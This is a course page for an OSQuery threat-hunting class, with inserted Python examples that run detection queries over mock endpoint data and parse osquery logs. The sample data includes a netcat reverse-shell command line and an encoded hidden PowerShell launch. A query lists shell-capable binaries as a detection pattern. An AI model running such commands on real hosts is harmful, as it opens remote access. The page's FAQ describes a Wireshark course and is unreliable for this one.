OSQuery for Security Analyst

Learn OSQuery to monitor, investigate, and secure your endpoints effectively. Unlock the power of OSQuery to detect security threats on your network and gain deeper visibility into your endpoints.

Course Description

This self-paced course is designed to equip Security Analysts with practical skills in OSQuery, an open-source endpoint agent that exposes operating-system state (processes, users, network sockets, scheduled tasks, installed software) as SQL tables that can be queried interactively or on a schedule. You'll begin with OSQuery basics, learning how to set up and configure it, and progress to crafting advanced queries to monitor system events, analyze its result logs, and detect anomalies.

Through hands-on labs, you'll simulate real-world security scenarios and build your capability in incident response and threat hunting. Ideal for SOC Analysts and IT security professionals, this course will enable you to use OSQuery for comprehensive endpoint visibility and proactive threat detection.

Course Content

  • What is Osquery?
  • How Osquery works
  • Installing Osquery on Linux
  • Installing Osquery on Windows
  • SELECT Statement – Fetching Data from Tables
  • WHERE Clause – Filtering the Results
  • AND / OR – Combining Multiple Conditions
  • ORDER BY and LIMIT – Sorting and Trimming Results
  • LIKE and IN – Pattern and Value Matching
  • COUNT() and GROUP BY – Aggregating and Grouping Data
  • JOINs in Osquery – Combining Related Tables
  • Querying live data with osqueryi
  • Important Tables
  • Osquery config file
  • Osquery logs
  1. Setting up ELK
  2. Setting up Fleet Server
  3. Setting up Fleet Agent
  4. Getting started with Osquery
  • Detecting New Processes
  • Unusual Network Connections
  • Scheduled Tasks and Cron Jobs
  • USB/External Device Usage
  • New User Accounts Created
  • Threat Hunting Process
  • Hunt#1: PowerShell Abuse via Command Line
  • Hypothesis, Data Sources and Indicators
  • Attack Simulation
  • Hunting for PowerShell Abuse using Osquery
  • Hunt#2: Malicious Process from Temp Directory
  • Hypothesis, Data Sources and Indicators
  • Attack Simulation
  • Hunting for Malicious Process
  • Hunt#3: Suspicious Scheduled Tasks
  • Hypothesis, Data Sources and Indicators
  • Attack Simulation
  • Hunting for Suspicious Scheduled Tasks
  • Hunt#4: Persistence via Startup Items
  • Hypothesis, Data Sources and Indicators
  • Attack Simulation
  • Hunting for Persistence via Startup Items
  • Hunt#5: Reverse Shell Execution
  • Hypothesis, Data Sources and Indicators
  • Attack Simulation
  • Hunting for Reverse Shell Execution
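The hunts listed above (PowerShell abuse, processes from temp directories, suspicious scheduled tasks and reverse shells) come down to SQL over osquery's tables, and the SQL basics modules (WHERE, LIKE, IN, ORDER BY, JOIN) are exactly what those queries use. The following is an added example, not material from the course or from the osquery project: because osquery's query engine is SQLite, the same statements run unchanged in osqueryi, so the example builds an in-memory SQLite mock of three osquery tables (`processes`, `process_open_sockets`, `scheduled_tasks`, using a subset of their real column names) and runs the hunt queries against constructed sample rows.

```python
"""Added example, not part of the course: osquery-style hunt queries run
against an in-memory SQLite mock of osquery tables. Tables use a subset of
the real osquery column names; all rows are constructed sample data."""
import sqlite3

SCHEMA = """
CREATE TABLE processes (pid INTEGER, parent INTEGER, name TEXT, path TEXT, cmdline TEXT);
CREATE TABLE process_open_sockets (pid INTEGER, remote_address TEXT, remote_port INTEGER, state TEXT);
CREATE TABLE scheduled_tasks (name TEXT, action TEXT, enabled INTEGER);
"""

PROCESSES = [  # (pid, parent, name, path, cmdline) -- constructed
    (4, 0, "System", "", ""),
    (1200, 900, "explorer.exe", r"C:\Windows\explorer.exe", "explorer.exe"),
    (2100, 1200, "powershell.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -w hidden -enc SQBFAFgA"),
    (2300, 2100, "update.exe", r"C:\Users\bob\AppData\Local\Temp\update.exe", "update.exe"),
    (2500, 1200, "nc.exe", r"C:\Tools\nc.exe", "nc.exe 10.0.0.5 4444 -e cmd.exe"),
    (2700, 4, "svchost.exe", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]
SOCKETS = [  # (pid, remote_address, remote_port, state) -- constructed
    (2500, "10.0.0.5", 4444, "ESTABLISHED"),
    (2700, "52.1.2.3", 443, "ESTABLISHED"),
    (2300, "198.51.100.7", 8080, "ESTABLISHED"),
]
TASKS = [  # (name, action, enabled) -- constructed
    (r"\Microsoft\Windows\Defrag\ScheduledDefrag", r"%windir%\system32\defrag.exe -c", 1),
    (r"\Updater", r"C:\Users\bob\AppData\Local\Temp\update.exe", 1),
    (r"\OldUpdater", r"C:\Users\bob\AppData\Local\Temp\old.exe", 0),
]

HUNTS = {
    # Hunt#1: PowerShell started with encoded-command, hidden-window or no-profile switches.
    "powershell_abuse": r"""
        SELECT pid, parent, cmdline FROM processes
        WHERE name = 'powershell.exe'
          AND (cmdline LIKE '% -enc%' OR cmdline LIKE '% -w hidden%' OR cmdline LIKE '% -nop%')
        ORDER BY pid""",
    # Hunt#2: executables running out of temp or world-writable directories.
    "process_from_temp": r"""
        SELECT pid, name, path FROM processes
        WHERE path LIKE '%\Temp\%' OR path LIKE '/tmp/%' OR path LIKE '/dev/shm/%'
        ORDER BY pid""",
    # Hunt#3: enabled scheduled tasks whose action points into a user profile.
    "suspicious_task": r"""
        SELECT name, action FROM scheduled_tasks
        WHERE enabled = 1 AND (action LIKE '%\AppData\%' OR action LIKE '%\Temp\%')
        ORDER BY name""",
    # Hunt#5: shell-capable binaries holding an established, non-loopback socket
    # (a JOIN across processes and process_open_sockets).
    "reverse_shell": r"""
        SELECT p.pid, p.name, s.remote_address, s.remote_port
        FROM processes p JOIN process_open_sockets s ON p.pid = s.pid
        WHERE p.name IN ('nc.exe', 'ncat.exe', 'cmd.exe', 'powershell.exe', 'nc', 'bash', 'sh')
          AND s.state = 'ESTABLISHED' AND s.remote_address NOT LIKE '127.%'
        ORDER BY p.pid""",
}


def build_db():
    """Create the in-memory mock of the osquery tables and load the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO processes VALUES (?,?,?,?,?)", PROCESSES)
    conn.executemany("INSERT INTO process_open_sockets VALUES (?,?,?,?)", SOCKETS)
    conn.executemany("INSERT INTO scheduled_tasks VALUES (?,?,?)", TASKS)
    return conn


def run_hunt(conn, hunt):
    """Run one named hunt query and return its rows as tuples."""
    return conn.execute(HUNTS[hunt]).fetchall()


def run_all(conn):
    """Run every hunt; returns {hunt_name: [rows]}."""
    return {hunt: run_hunt(conn, hunt) for hunt in HUNTS}


if __name__ == "__main__":
    db = build_db()
    for hunt, rows in run_all(db).items():
        print(f"{hunt}: {rows}")
```

SQLite's LIKE is case-insensitive for ASCII and treats backslash literally unless an ESCAPE clause is given, which is why the Windows path patterns work as written; the same holds in osqueryi. The real osquery tables carry many more columns than the mock, so against a live host you would typically also pull `uid`, `start_time` and the parent's name (a self-join on `processes`) before treating a hit as an alert.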
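The "Osquery logs" module and the detection topics (new processes, new user accounts, USB devices) meet in the results log that osqueryd writes for scheduled queries: one JSON object per line, where a differential query reports each changed row with `"action":"added"` or `"removed"`, and a snapshot query reports the whole result set in a `"snapshot"` array. The following is an added example, not course material or osquery project code, that parses such a log and turns rows into alerts. The query names (`pack_hunts_*`) and every log line are constructed for the example; the field layout follows osquery's results-log format, but real deployments carry more decorations and differently named queries.

```python
"""Added example, not part of the course: parse osquery's JSON results log
and raise alerts from scheduled-query results. Query names and all sample
lines below are constructed; they are not output from a real host."""
import json

SAMPLE_LOG = r'''
{"name":"pack_hunts_new_users","hostIdentifier":"ws-03","calendarTime":"Mon Jan  8 09:00:00 2024 UTC","unixTime":1704704400,"epoch":0,"counter":0,"numerics":false,"decorations":{},"columns":{"uid":"0","username":"root","shell":"/bin/bash"},"action":"added"}
{"name":"pack_hunts_new_users","hostIdentifier":"ws-01","calendarTime":"Mon Jan  8 10:00:00 2024 UTC","unixTime":1704708000,"epoch":0,"counter":2,"numerics":false,"decorations":{"host_uuid":"2b7f"},"columns":{"uid":"1001","username":"svc_backup","shell":"/bin/bash"},"action":"added"}
{"name":"pack_hunts_new_users","hostIdentifier":"ws-01","calendarTime":"Mon Jan  8 10:00:00 2024 UTC","unixTime":1704708000,"epoch":0,"counter":2,"numerics":false,"decorations":{"host_uuid":"2b7f"},"columns":{"uid":"1000","username":"olduser","shell":"/bin/bash"},"action":"removed"}
{"name":"pack_hunts_processes","hostIdentifier":"ws-01","calendarTime":"Mon Jan  8 10:01:00 2024 UTC","unixTime":1704708060,"epoch":0,"counter":5,"numerics":false,"decorations":{"host_uuid":"2b7f"},"columns":{"pid":"2300","name":"update.exe","path":"C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe"},"action":"added"}
{"name":"pack_hunts_processes","hostIdentifier":"ws-01","calendarTime":"Mon Jan  8 10:01:00 2024 UTC","unixTime":1704708060,"epoch":0,"counter":5,"numerics":false,"decorations":{"host_uuid":"2b7f"},"columns":{"pid":"2700","name":"svchost.exe","path":"C:\\Windows\\System32\\svchost.exe"},"action":"added"}
{"name":"pack_hunts_usb","hostIdentifier":"ws-02","calendarTime":"Mon Jan  8 10:02:00 2024 UTC","unixTime":1704708120,"epoch":0,"counter":0,"numerics":false,"decorations":{"host_uuid":"91aa"},"snapshot":[{"vendor":"SanDisk","model":"Cruzer","serial":"4C53"},{"vendor":"Kingston","model":"DataTraveler","serial":"0019"}],"action":"snapshot"}
this line is not JSON and must be skipped rather than crash the parser
'''

# Path fragments (lower-cased) that mark user-writable staging locations.
TEMP_MARKERS = ("\\temp\\", "\\appdata\\", "/tmp/", "/dev/shm/")


def parse_results_log(text):
    """Return ([row, ...], bad_line_count).

    Each row is a dict with query, host, action, counter, time and columns.
    Snapshot lines are expanded into one row per result; unparsable lines
    are counted and skipped so one corrupt line never stops ingestion."""
    rows, bad = [], 0
    for line in text.splitlines():
        if not line.strip():
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            bad += 1
            continue
        base = {
            "query": rec.get("name", ""),
            "host": rec.get("hostIdentifier", ""),
            "action": rec.get("action", ""),
            "counter": int(rec.get("counter", 0)),
            "time": rec.get("unixTime", 0),
        }
        if base["action"] == "snapshot":
            for cols in rec.get("snapshot", []):
                rows.append({**base, "columns": cols})
        else:
            rows.append({**base, "columns": rec.get("columns", {})})
    return rows, bad


def alerts(rows):
    """Turn parsed rows into (host, alert_type, detail) tuples.

    A differential query's first run (counter 0) reports every existing row
    as "added"; those are a baseline, not new activity, and are skipped."""
    out = []
    for row in rows:
        q, action, cols = row["query"], row["action"], row["columns"]
        if action == "added" and row["counter"] == 0:
            continue  # initial full result set, nothing actually changed
        if q.endswith("new_users") and action == "added":
            out.append((row["host"], "new_account", cols.get("username")))
        elif q.endswith("processes") and action == "added":
            if any(m in cols.get("path", "").lower() for m in TEMP_MARKERS):
                out.append((row["host"], "process_from_temp", cols.get("path")))
        elif q.endswith("usb") and action == "snapshot":
            detail = f'{cols.get("vendor")} {cols.get("model")} {cols.get("serial")}'
            out.append((row["host"], "usb_device", detail))
    return out


if __name__ == "__main__":
    parsed, skipped = parse_results_log(SAMPLE_LOG)
    print(f"{len(parsed)} rows parsed, {skipped} line(s) skipped")
    for alert in alerts(parsed):
        print(alert)
```

Two points carry over to a Fleet or ELK pipeline: the `removed` rows are as useful as `added` ones when hunting (a user account or scheduled task that disappears after an intrusion is a cleanup signal), and column values arrive as strings unless the query is configured with `numerics`, so compare `pid` or `uid` as strings or cast them explicitly.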

Instructor

Rajneesh Gupta

Senior Security Consultant

Common Questions

Most Popular Questions

What exactly is Wireshark?

Wireshark is an open-source tool that captures and analyzes network traffic in real time. It allows security professionals to examine network packets and identify anomalies, suspicious behavior, and threats at the packet level.

Do I need any previous experience with Wireshark?

No prior experience with Wireshark is required. The course covers both the basics and advanced concepts, making it suitable for beginners and professionals looking to deepen their expertise.

How long does it take to complete the course?

This course is self-paced, so you can complete it at your own pace. On average, learners take 4-6 weeks to finish, but you have lifetime access to revisit any section.

What practical skills will I gain?

You'll gain hands-on skills in capturing, filtering, and analyzing network traffic to detect threats. By the end, you'll be able to use Wireshark to recognize various network attacks, identify suspicious patterns, and apply these skills to incident response scenarios.

Is the course content updated for the latest version of Wireshark?

Yes, we regularly update the content to ensure compatibility with the latest version of Wireshark, covering new features, improvements, and any relevant security techniques.

Will I receive a certificate of completion?

Yes, upon successful completion, you will receive a certificate from HaxSecurity that you can add to your resume and LinkedIn profile to showcase your Wireshark skills.

What resources will I need for this course?

You’ll need a computer with a stable internet connection to download Wireshark and capture network traffic. No additional software is required, and detailed setup instructions are provided within the course.

What support options are available during the course?

Throughout the course, you can reach out to our support team via email or join our discussion forums to interact with peers. Additionally, Rajneesh hosts periodic live Q&A sessions to address specific questions and provide guidance.
